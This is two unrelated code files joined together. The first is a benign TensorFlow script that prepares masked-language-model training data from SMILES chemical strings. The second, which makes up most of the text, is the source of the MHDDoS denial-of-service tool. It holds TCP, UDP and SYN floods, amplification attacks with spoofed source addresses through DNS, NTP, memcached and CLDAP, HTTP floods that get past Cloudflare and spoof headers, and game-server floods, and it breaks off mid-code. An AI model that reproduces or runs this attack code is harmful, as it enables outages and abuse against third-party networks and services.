            tf.logging.info("*** Example ***")
            tf.logging.info("tokens: %s" % " ".join(instance.tokens))
            for feature_name in features.keys():
                feature = features[feature_name]
                values = []
                if feature.int64_list.value:
                    values = feature.int64_list.value
                elif feature.float_list.value:
                    values = feature.float_list.value
                tf.logging.info(
                    "%s: %s" % (feature_name, " ".join([str(x) for x in values])))
    for writer in writers:
        writer.close()
    tf.logging.info("Wrote %d total instances", total_written)


def create_masked_lm_predictions(tokens, masked_lm_prob, max_predictions_per_seq,
                                 vocab_words, rng):
    # BERT-style masking: pick ~masked_lm_prob of the positions (capped at
    # max_predictions_per_seq) and replace them 80% with [MASK], 10% with the
    # original token, 10% with a random vocab word.
    # e.g. masked_lm_prob 0.15, max_seq_length 170,
    #      max_predictions_per_seq 26 (170*.15)
    # vocab_words = list(tokenizer.vocab.keys())
    # rng = random.Random(FLAGS.random_seed)
    MaskedLmInstance = collections.namedtuple("MaskedLmInstance",
                                              ["index", "label"])
    cand_indexes = []
    for (i, token) in enumerate(tokens):
        # Never mask the sequence delimiters.
        if token == "[BEGIN]" or token == "[END]":
            continue
        cand_indexes.append(i)
    rng.shuffle(cand_indexes)
    output_tokens = list(tokens)
    num_to_predict = min(max_predictions_per_seq,
                         max(1, int(round(len(tokens) * masked_lm_prob))))
    masked_lms = []
    covered_indexes = set()
    for index in cand_indexes:
        if len(masked_lms) >= num_to_predict:
            break
        if index in covered_indexes:
            continue
        covered_indexes.add(index)
        masked_token = None
        # 80% of the time, replace with [MASK]
        if rng.random() < 0.8:
            masked_token = "[MASK]"
        else:
            # 10% of the time, keep original
            if rng.random() < 0.5:
                masked_token = tokens[index]
            # 10% of the time, replace with random word
            else:
                # Starts at index 4 — presumably indices 0-3 are special
                # tokens in the vocab; TODO confirm against vocab_smiles.txt.
                masked_token = vocab_words[rng.randint(4, len(vocab_words) - 1)]
        output_tokens[index] = masked_token
        masked_lms.append(MaskedLmInstance(index=index, label=tokens[index]))
    masked_lms = sorted(masked_lms, key=lambda x: x.index)
    masked_lm_positions = []
    masked_lm_labels = []
    for p in masked_lms:
        masked_lm_positions.append(p.index)
        masked_lm_labels.append(p.label)
    return (output_tokens, masked_lm_positions, masked_lm_labels)


class TrainingInstance(object):
    """A single training instance (sentence pair)."""

    def __init__(self, tokens, masked_lm_positions, masked_lm_labels):
        # tokens: masked token sequence (after create_masked_lm_predictions)
        # masked_lm_positions: indices that were masked
        # masked_lm_labels: original tokens at those indices
        self.tokens = tokens
        self.masked_lm_positions = masked_lm_positions
        self.masked_lm_labels = masked_lm_labels

    def __str__(self):
        s = ""
        s += "tokens: %s\n" % (" ".join(self.tokens))
        s += "masked_lm_positions: %s\n" % (" ".join([str(x) for x in self.masked_lm_positions]))
        s += "masked_lm_labels: %s\n" % (" ".join(self.masked_lm_labels))
        s += "\n"
        return s

    def __repr__(self):
        return self.__str__()


def truncate_seq_pair(tokens, max_num_tokens, rng):
    # Trim `tokens` IN PLACE until it fits within max_num_tokens, randomly
    # dropping from the front or the back each step.
    while True:
        total_length = len(tokens)
        if total_length <= max_num_tokens:
            break
        trunc_tokens = tokens
        assert len(trunc_tokens) >= 1
        # We want to sometimes truncate from the front and sometimes from the
        # back to add more randomness and avoid biases.
        if rng.random() < 0.5:
            del trunc_tokens[0]
        else:
            trunc_tokens.pop()


# (Removed ~40 lines of commented-out prototypes: a single-process
#  read_smiles() and a worker_speed_test() harness superseded by
#  tfrecord_smiles_multiprocess below.)


def tfrecord_smiles_multiprocess(input_files):
    # Fan out one worker process per input file; each worker writes its own
    # group of 10 output shards (see read_smiles_worker).
    tokenizer = SmilesTokenizer("%s/vocab_smiles.txt" % (FLAGS.base_path))
    vocab_words = list(tokenizer.vocab.keys())
    rng = random.Random(FLAGS.random_seed)
    # manager = Manager()
    jobs = []
    # instances = manager.list()
    for wid, input_file in enumerate(input_files):
        p = Process(target=read_smiles_worker,
                    args=(wid, input_file, tokenizer, vocab_words, rng))
        jobs.append(p)
    for proc in jobs:
        proc.start()
    for proc in jobs:
        proc.join()


def read_smiles_worker(wid, input_file, tokenizer, vocab_words, rng):
    # Worker: read one CSV-ish file of SMILES (second comma field per line),
    # tokenize, truncate, prepend [CLS], apply masked-LM corruption, and
    # write the resulting instances to this worker's 10 output shards.
    len_list = []
    max_num_tokens = FLAGS.max_seq_length - 1  # reserve one slot for [CLS]
    instances = []
    tf.logging.info("[worker %d] Current File: %s" % (wid, input_file))
    with tf.gfile.GFile(input_file, "r") as reader:  # 97,092,853, 97M
        while True:
            line = reader.readline()
            if not line:
                break
            smiles = line.strip().split(',')[1]
            len_list.append(len(smiles))
            tokens = tokenizer.tokenize(smiles)
            truncate_seq_pair(tokens, max_num_tokens, rng)
            tokens.insert(0, "[CLS]")
            (tokens, masked_lm_positions,
             masked_lm_labels) = create_masked_lm_predictions(tokens, FLAGS.masked_lm_prob,
                                                              FLAGS.max_predictions_per_seq,
                                                              vocab_words, rng)
            instance = TrainingInstance(
                tokens=tokens,
                masked_lm_positions=masked_lm_positions,
                masked_lm_labels=masked_lm_labels)
            # Progress log every 100k instances.
            if len(instances) % 100000 == 0:
                print(len(instances))
            instances.append(instance)
    # Shard layout, 10 shards per worker:
    # 0: 0-9
    # 1: 10-19
    # ...
    # 49: 490-499
    output_files = ["%s/smiles.%03d" % (FLAGS.output_dir, n)
                    for n in range(wid*10, wid*10+10)]
    tf.logging.info("*** Writing to output files ***")
    for output_file in output_files:
        tf.logging.info("  %s", output_file)
    write_instance_to_example_files(instances, tokenizer, FLAGS.max_seq_length,
                                    FLAGS.max_predictions_per_seq, output_files)


if __name__=="__main__":
    tf.logging.set_verbosity(tf.logging.INFO)
    tf.logging.info("*** CREATING TFRECORD ***")
    # # Speed test
    # input_file = "%s/moelecule/10k.txt" % FLAGS.base_path
    # worker_speed_test(input_file)
    # exit()
    input_files = []
    for input_pattern in FLAGS.input_file.split(","):
        input_files.extend(tf.gfile.Glob(input_pattern))
    tfrecord_smiles_multiprocess(input_files)
start.py
#!/usr/bin/env python3 from concurrent.futures import ThreadPoolExecutor, as_completed from contextlib import suppress from itertools import cycle from json import load from logging import basicConfig, getLogger, shutdown from math import log2, trunc from multiprocessing import RawValue from os import urandom as randbytes from pathlib import Path from random import choice as randchoice from random import randint from socket import (AF_INET, IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, IPPROTO_UDP, SOCK_DGRAM, SOCK_RAW, SOCK_STREAM, TCP_NODELAY, gethostbyname, gethostname, socket) from ssl import CERT_NONE, SSLContext, create_default_context from struct import pack as data_pack from subprocess import run from sys import argv from sys import exit as _exit from threading import Event, Thread from time import sleep, time from typing import Any, List, Set, Tuple from urllib import parse from uuid import UUID, uuid4 from PyRoxy import Proxy, ProxyChecker, ProxyType, ProxyUtiles from PyRoxy import Tools as ProxyTools from certifi import where from cfscrape import create_scraper from dns import resolver from icmplib import ping from impacket.ImpactPacket import IP, TCP, UDP, Data from psutil import cpu_percent, net_io_counters, process_iter, virtual_memory from requests import Response, Session, exceptions, get from yarl import URL basicConfig(format='[%(asctime)s - %(levelname)s] %(message)s', datefmt="%H:%M:%S") logger = getLogger("MHDDoS") logger.setLevel("INFO") ctx: SSLContext = create_default_context(cafile=where()) ctx.check_hostname = False ctx.verify_mode = CERT_NONE __version__: str = "2.4 SNAPSHOT" __dir__: Path = Path(__file__).parent __ip__: Any = None def getMyIPAddress(): global __ip__ if __ip__: return __ip__ with suppress(Exception): __ip__ = get('https://api.my-ip.io/ip', timeout=.1).text with suppress(Exception): __ip__ = get('https://ipwhois.app/json/', timeout=.1).json()["ip"] with suppress(Exception): __ip__ = get('https://ipinfo.io/json', 
timeout=.1).json()["ip"] with suppress(Exception): __ip__ = ProxyTools.Patterns.IP.search(get('http://checkip.dyndns.org/', timeout=.1).text) with suppress(Exception): __ip__ = ProxyTools.Patterns.IP.search(get('https://spaceiran.com/myip/', timeout=.1).text) with suppress(Exception): __ip__ = get('https://ip.42.pl/raw', timeout=.1).text return getMyIPAddress() def exit(*message): if message: logger.error(" ".join(message)) shutdown() _exit(1) class Methods: LAYER7_METHODS: Set[str] = { "CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS", "EVEN", "GSB", "DGB", "AVB", "CFBUAM", "APACHE", "XMLRPC", "BOT", "BOMB", "DOWNLOADER" } LAYER4_METHODS: Set[str] = { "TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM", "NTP", "DNS", "ARD", "CHAR", "RDP", "MCBOT", "CONNECTION", "CPS", "FIVEM", "TS3", "MCPE", "CLDAP" } ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS} google_agents = [ "Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, " "like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; " "+http://www.google.com/bot.html)) " "Googlebot/2.1 (+http://www.google.com/bot.html)", "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" ] class Counter(object): def __init__(self, value=0): self._value = RawValue('i', value) def __iadd__(self, value): self._value.value += value return self def __int__(self): return self._value.value def set(self, value): self._value.value = value return self REQUESTS_SENT = Counter() BYTES_SEND = Counter() class Tools: @staticmethod def humanbytes(i: int, binary: bool = False, precision: int = 2): MULTIPLES = [ "B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B" ] if i > 0: base = 1024 if binary else 1000 multiple = trunc(log2(i) / log2(base)) value = i / pow(base, multiple) suffix = MULTIPLES[multiple].format("i" if binary else "") return 
f"{value:.{precision}f} {suffix}" else: return f"-- B" @staticmethod def humanformat(num: int, precision: int = 2): suffixes = ['', 'k', 'm', 'g', 't', 'p'] if num > 999: obje = sum( [abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))]) return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}' else: return num @staticmethod def sizeOfRequest(res: Response) -> int: size: int = len(res.request.method) size += len(res.request.url) size += len('\r\n'.join(f'{key}: {value}' for key, value in res.request.headers.items())) return size @staticmethod def randchr(lengh: int) -> str: return "".join([chr(randint(0, 1000)) for _ in range(lengh)]).strip() @staticmethod def send(sock: socket, packet: bytes): global BYTES_SEND, REQUESTS_SENT if not sock.send(packet): return False BYTES_SEND += len(packet) REQUESTS_SENT += 1 return True @staticmethod def sendto(sock, packet, target): global BYTES_SEND, REQUESTS_SENT if not sock.sendto(packet, target): return False BYTES_SEND += len(packet) REQUESTS_SENT += 1 return True @staticmethod def safe_close(sock=None): if sock: sock.close() class Minecraft: @staticmethod def varint(d: int) -> bytes: o = b'' while True: b = d & 0x7F d >>= 7 o += data_pack("B", b | (0x80 if d > 0 else 0)) if d == 0: break return o @staticmethod def data(*payload: bytes) -> bytes: payload = b''.join(payload) return Minecraft.varint(len(payload)) + payload @staticmethod def short(integer: int) -> bytes: return data_pack('>H', integer) @staticmethod def handshake(target: Tuple[str, int], version: int, state: int) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(version), Minecraft.data(target[0].encode()), Minecraft.short(target[1]), Minecraft.varint(state)) @staticmethod def handshake_forwarded(target: Tuple[str, int], version: int, state: int, ip: str, uuid: UUID) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(version), Minecraft.data( target[0].encode(), b"\x00", ip.encode(), b"\x00", 
uuid.hex.encode() ), Minecraft.short(target[1]), Minecraft.varint(state)) @staticmethod def login(username: str) -> bytes: if isinstance(username, str): username = username.encode() return Minecraft.data(Minecraft.varint(0x00), Minecraft.data(username)) @staticmethod def keepalive(num_id: int) -> bytes: return Minecraft.data(Minecraft.varint(0x00), Minecraft.varint(num_id)) @staticmethod def chat(message: str) -> bytes: return Minecraft.data(Minecraft.varint(0x01), Minecraft.data(message.encode())) # noinspection PyBroadException,PyUnusedLocal class Layer4(Thread): _method: str _target: Tuple[str, int] _ref: Any SENT_FLOOD: Any _amp_payloads = cycle _proxies: List[Proxy] = None def __init__(self, target: Tuple[str, int], ref: List[str] = None, method: str = "TCP", synevent: Event = None, proxies: Set[Proxy] = None): Thread.__init__(self, daemon=True) self._amp_payload = None self._amp_payloads = cycle([]) self._ref = ref self._method = method self._target = target self._synevent = synevent if proxies: self._proxies = list(proxies) def run(self) -> None: if self._synevent: self._synevent.wait() self.select(self._method) while self._synevent.is_set(): self.SENT_FLOOD() def open_connection(self, conn_type=AF_INET, sock_type=SOCK_STREAM, proto_type=IPPROTO_TCP): if self._proxies: s = randchoice(self._proxies).open_socket( conn_type, sock_type, proto_type) else: s = socket(conn_type, sock_type, proto_type) s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) s.connect(self._target) return s def select(self, name): self.SENT_FLOOD = self.TCP if name == "UDP": self.SENT_FLOOD = self.UDP if name == "SYN": self.SENT_FLOOD = self.SYN if name == "VSE": self.SENT_FLOOD = self.VSE if name == "TS3": self.SENT_FLOOD = self.TS3 if name == "MCPE": self.SENT_FLOOD = self.MCPE if name == "FIVEM": self.SENT_FLOOD = self.FIVEM if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT if name == "CPS": self.SENT_FLOOD = self.CPS if name == "CONNECTION": self.SENT_FLOOD = self.CONNECTION if name == 
"MCBOT": self.SENT_FLOOD = self.MCBOT if name == "RDP": self._amp_payload = ( b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "CLDAP": self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00' b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00', 389) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "MEM": self._amp_payload = ( b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "CHAR": self._amp_payload = (b'\x01', 19) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "ARD": self._amp_payload = (b'\x00\x14\x00\x00', 3283) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "NTP": self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) if name == "DNS": self._amp_payload = ( b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00' b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53) self.SENT_FLOOD = self.AMP self._amp_payloads = cycle(self._generate_amp()) def TCP(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while Tools.send(s, randbytes(1024)): continue Tools.safe_close(s) def MINECRAFT(self) -> None: handshake = Minecraft.handshake(self._target, 74, 1) ping = Minecraft.data(b'\x00') s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while Tools.send(s, handshake): Tools.send(s, ping) Tools.safe_close(s) def CPS(self) -> None: global REQUESTS_SENT s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: REQUESTS_SENT += 1 Tools.safe_close(s) def 
alive_connection(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: while s.recv(1): continue Tools.safe_close(s) def CONNECTION(self) -> None: global REQUESTS_SENT with suppress(Exception): Thread(target=self.alive_connection).start() REQUESTS_SENT += 1 def UDP(self) -> None: s = None with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, randbytes(1024), self._target): continue Tools.safe_close(s) def SYN(self) -> None: payload = self._genrate_syn() s = None with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s: s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def AMP(self) -> None: payload = next(self._amp_payloads) s = None with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_UDP) as s: s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) while Tools.sendto(s, *payload): continue Tools.safe_close(s) def MCBOT(self) -> None: s = None with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: Tools.send(s, Minecraft.handshake_forwarded(self._target, 47, 2, ProxyTools.Random.rand_ipv4(), uuid4())) Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}")) sleep(1.5) c = 360 while Tools.send(s, Minecraft.keepalive(randint(1111111, 9999999))): c -= 1 if c: continue c = 360 Tools.send(s, Minecraft.chat(Tools.randchr(100))) Tools.safe_close(s) def VSE(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65' b'\x20\x51\x75\x65\x72\x79\x00') with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def FIVEM(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00' with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def TS3(self) -> None: global BYTES_SEND, 
REQUESTS_SENT payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02' with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def MCPE(self) -> None: global BYTES_SEND, REQUESTS_SENT payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f' b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20' b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c' b'\x73') with socket(AF_INET, SOCK_DGRAM) as s: while Tools.sendto(s, payload, self._target): continue Tools.safe_close(s) def _genrate_syn(self) -> bytes: ip: IP = IP() ip.set_ip_src(getMyIPAddress()) ip.set_ip_dst(self._target[0]) tcp: TCP = TCP() tcp.set_SYN() tcp.set_th_dport(self._target[1]) tcp.set_th_sport(randint(1, 65535)) ip.contains(tcp) return ip.get_packet() def _generate_amp(self): payloads = [] for ref in self._ref: ip: IP = IP() ip.set_ip_src(self._target[0]) ip.set_ip_dst(ref) ud: UDP = UDP() ud.set_uh_dport(self._amp_payload[1]) ud.set_uh_sport(self._target[1]) ud.contains(Data(self._amp_payload[0])) ip.contains(ud) payloads.append((ip.get_packet(), (ref, self._amp_payload[1]))) return payloads # noinspection PyBroadException,PyUnusedLocal class HttpFlood(Thread): _proxies: List[Proxy] = None _payload: str _defaultpayload: Any _req_type: str _useragents: List[str] _referers: List[str] _target: URL _method: str _rpc: int _synevent: Any SENT_FLOOD: Any def __init__(self, target: URL, host: str, method: str = "GET", rpc: int = 1, synevent: Event = None, useragents: Set[str] = None, referers: Set[str] = None, proxies: Set[Proxy] = None) -> None: Thread.__init__(self, daemon=True) self.SENT_FLOOD = None self._synevent = synevent self._rpc = rpc self._method = method self._target = target self._host = host self._raw_target = (self._host, (self._target.port or 80)) if not self._target.host[len(self._target.host) - 1].isdigit(): self._raw_target = 
(self._host, (self._target.port or 80)) if not referers: referers: List[str] = [ "https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=", ",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer" "/sharer.php?u=", ",https://drive.google.com/viewerng/viewer?url=", ",https://www.google.com/translate?u=" ] self._referers = list(referers) if proxies: self._proxies = list(proxies) if not useragents: useragents: List[str] = [ 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 ' 'Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0' ] self._useragents = list(useragents) self._req_type = self.getMethodType(method) self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type, target.raw_path_qs, randchoice(['1.0', '1.1', '1.2'])) self._payload = (self._defaultpayload + 'Accept-Encoding: gzip, deflate, br\r\n' 'Accept-Language: en-US,en;q=0.9\r\n' 'Cache-Control: max-age=0\r\n' 'Connection: Keep-Alive\r\n' 'Sec-Fetch-Dest: document\r\n' 'Sec-Fetch-Mode: navigate\r\n' 'Sec-Fetch-Site: none\r\n' 'Sec-Fetch-User: ?1\r\n' 'Sec-Gpc: 1\r\n' 'Pragma: no-cache\r\n' 'Upgrade-Insecure-Requests: 1\r\n') def run(self) -> None: if self._synevent: self._synevent.wait() self.select(self._method) while self._synevent.is_set(): self.SENT_FLOOD() @property def SpoofIP(self) -> str: spoof: str = ProxyTools.Random.rand_ipv4() return ("X-Forwarded-Proto: Http\r\n" f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n" f"Via: {spoof}\r\n" f"Client-IP: {spoof}\r\n" f'X-Forwarded-For: {spoof}\r\n' f'Real-IP: {spoof}\r\n') def generate_payload(self, other: str = None) -> bytes: return str.encode((self._payload + "Host: %s\r\n" % 
self._target.authority + self.randHeadercontent + (other if other else "") + "\r\n")) def open_connection(self) -> socket: if self._proxies: sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM) else: sock = socket(AF_INET, SOCK_STREAM) sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1) sock.connect(self._raw_target) if self._target.scheme.lower() == "https": sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False, do_handshake_on_connect=True, suppress_ragged_eofs=True) return sock @property def randHeadercontent(self) -> str: return (f"User-Agent: {randchoice(self._useragents)}\r\n" f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" + self.SpoofIP) @staticmethod def getMethodType(method: str) -> str: return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN", "DYN", "SLOW", "PPS", "APACHE", "BOT", } \ else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \ else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \ else "REQUESTS" def POST(self) -> None: payload: bytes = self.generate_payload( ("Content-Length: 44\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/json\r\n\r\n" '{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def STRESS(self) -> None: payload: bytes = self.generate_payload( (f"Content-Length: 524\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/json\r\n\r\n" '{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def COOKIES(self) -> None: payload: bytes = self.generate_payload( "Cookie: _ga=GA%s;" " _gat=1;" " __cfduid=dc232334gwdsd23434542342342342475611928;" " %s=%s\r\n" % (randint(1000, 99999), ProxyTools.Random.rand_str(6), 
ProxyTools.Random.rand_str(32))) s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def APACHE(self) -> None: payload: bytes = self.generate_payload( "Range: bytes=0-,%s" % ",".join("5-%d" % i for i in range(1, 1024))) s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def XMLRPC(self) -> None: payload: bytes = self.generate_payload( ("Content-Length: 345\r\n" "X-Requested-With: XMLHttpRequest\r\n" "Content-Type: application/xml\r\n\r\n" "<?xml version='1.0' encoding='iso-8859-1'?>" "<methodCall><methodName>pingback.ping</methodName>" "<params><param><value><string>%s</string></value>" "</param><param><value><string>%s</string>" "</value></param></params></methodCall>") % (ProxyTools.Random.rand_str(64), ProxyTools.Random.rand_str(64)))[:-2] s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def PPS(self) -> None: s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, self._defaultpayload) Tools.safe_close(s) def GET(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def BOT(self) -> None: payload: bytes = self.generate_payload() p1, p2 = str.encode( "GET /robots.txt HTTP/1.1\r\n" "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: text/plain,text/html,*/*\r\n" "User-Agent: %s\r\n" % randchoice(google_agents) + "Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode( "GET /sitemap.xml HTTP/1.1\r\n" "Host: %s\r\n" % self._target.raw_authority + "Connection: Keep-Alive\r\n" "Accept: */*\r\n" "From: googlebot(at)googlebot.com\r\n" "User-Agent: %s\r\n" % randchoice(google_agents) + "Accept-Encoding: 
gzip,deflate,br\r\n" "If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) + "If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n") s = None with suppress(Exception), self.open_connection() as s: Tools.send(s, p1) Tools.send(s, p2) for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def EVEN(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: while Tools.send(s, payload) and s.recv(1): continue Tools.safe_close(s) def OVH(self) -> None: payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(min(self._rpc, 5)): Tools.send(s, payload) Tools.safe_close(s) def CFB(self): global REQUESTS_SENT, BYTES_SEND pro = None if self._proxies: pro = randchoice(self._proxies) s = None with suppress(Exception), create_scraper() as s: for _ in range(self._rpc): if pro: with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def CFBUAM(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: Tools.send(s, payload) sleep(5.01) for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def AVB(self): payload: bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): sleep(max(self._rpc / 1000, 1)) Tools.send(s, payload) Tools.safe_close(s) def DGB(self): global REQUESTS_SENT, BYTES_SEND s = None with suppress(Exception), create_scraper() as s: for _ in range(min(self._rpc, 5)): sleep(min(self._rpc, 5) / 100) if self._proxies: pro = randchoice(self._proxies) with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += 
Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def DYN(self): payload: str | bytes = str.encode(self._payload + "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) + self.randHeadercontent + "\r\n") s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def DOWNLOADER(self): payload: str | bytes = self.generate_payload() s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) while 1: sleep(.01) data = s.recv(1) if not data: break Tools.send(s, b'0') Tools.safe_close(s) def BYPASS(self): global REQUESTS_SENT, BYTES_SEND pro = None if self._proxies: pro = randchoice(self._proxies) s = None with suppress(Exception), Session() as s: for _ in range(self._rpc): if pro: with s.get(self._target.human_repr(), proxies=pro.asRequest()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) continue with s.get(self._target.human_repr()) as res: REQUESTS_SENT += 1 BYTES_SEND += Tools.sizeOfRequest(res) Tools.safe_close(s) def GSB(self): payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type, self._target.raw_path_qs, ProxyTools.Random.rand_str(6)) + "Host: %s\r\n" % self._target.authority + self.randHeadercontent + 'Accept-Encoding: gzip, deflate, br\r\n' 'Accept-Language: en-US,en;q=0.9\r\n' 'Cache-Control: max-age=0\r\n' 'Connection: Keep-Alive\r\n' 'Sec-Fetch-Dest: document\r\n' 'Sec-Fetch-Mode: navigate\r\n' 'Sec-Fetch-Site: none\r\n' 'Sec-Fetch-User: ?1\r\n' 'Sec-Gpc: 1\r\n' 'Pragma: no-cache\r\n' 'Upgrade-Insecure-Requests: 1\r\n\r\n') s = None with suppress(Exception), self.open_connection() as s: for _ in range(self._rpc): Tools.send(s, payload) Tools.safe_close(s) def NULL(self) -> None: payload: str | bytes = str.encode(self._payload + "Host: %s\r\n" % self._target.authority + 
